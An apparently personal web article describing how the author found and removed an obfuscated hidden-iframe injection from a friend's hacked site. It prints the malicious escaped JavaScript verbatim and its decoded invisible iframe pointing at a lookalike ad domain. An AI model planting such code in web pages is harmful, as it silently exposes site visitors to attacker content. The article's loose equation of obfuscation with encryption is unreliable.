INTRODUCTION
Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption. The web page is not really encrypted, or else the web page would not display when accessed. The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.
I had a friend who was a victim of these obfuscated iframe injection attacks. When I tested his site, all tests indicated that his site was clean, but yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some codes that were obfuscated that my friend had no explanation for.
Identifying The Obfuscated iFrame
Doing some research, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) JavaScript code. My friend's website appeared to be a victim of this obfuscated iframe injection.
The following was the suspected malicious iframe injection obfuscated code:
<Script Language='Javascript'>
<!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
</Script>
Researching the issue further I found some websites that were able to deobfuscate, or decrypt, the code at. Just Google "Javascript DeObfuscator" to find the sites.
What you do is copy only the obsfuscated code as shown below:
%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D
You then paste the code into the form box they provide and then click on "Deobfuscate".
The following was the resulting malicious iframe injection code:
<iframe src= http: //goooogleadsence.***/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ></iframe>
Notice the spelling "goooogleadsence". Looks strange, doesn't it. By completely removing the obfuscated (escaped) JavaScript code, my friend's website was clean and safe again.
CONCLUSION
It is important to remember that not all iframes are bad. Although obfuscation was used to hide the iframe injection, obfuscation can also be used to legitimately hide links such as your download link, or, your PayPal link. Before you remove a suspected iframe, make sure it is not relevant to your web page. You might want to download a copy of the web page before you do any deleting just to be sure if your are not certain.
This page was published on It was last revised on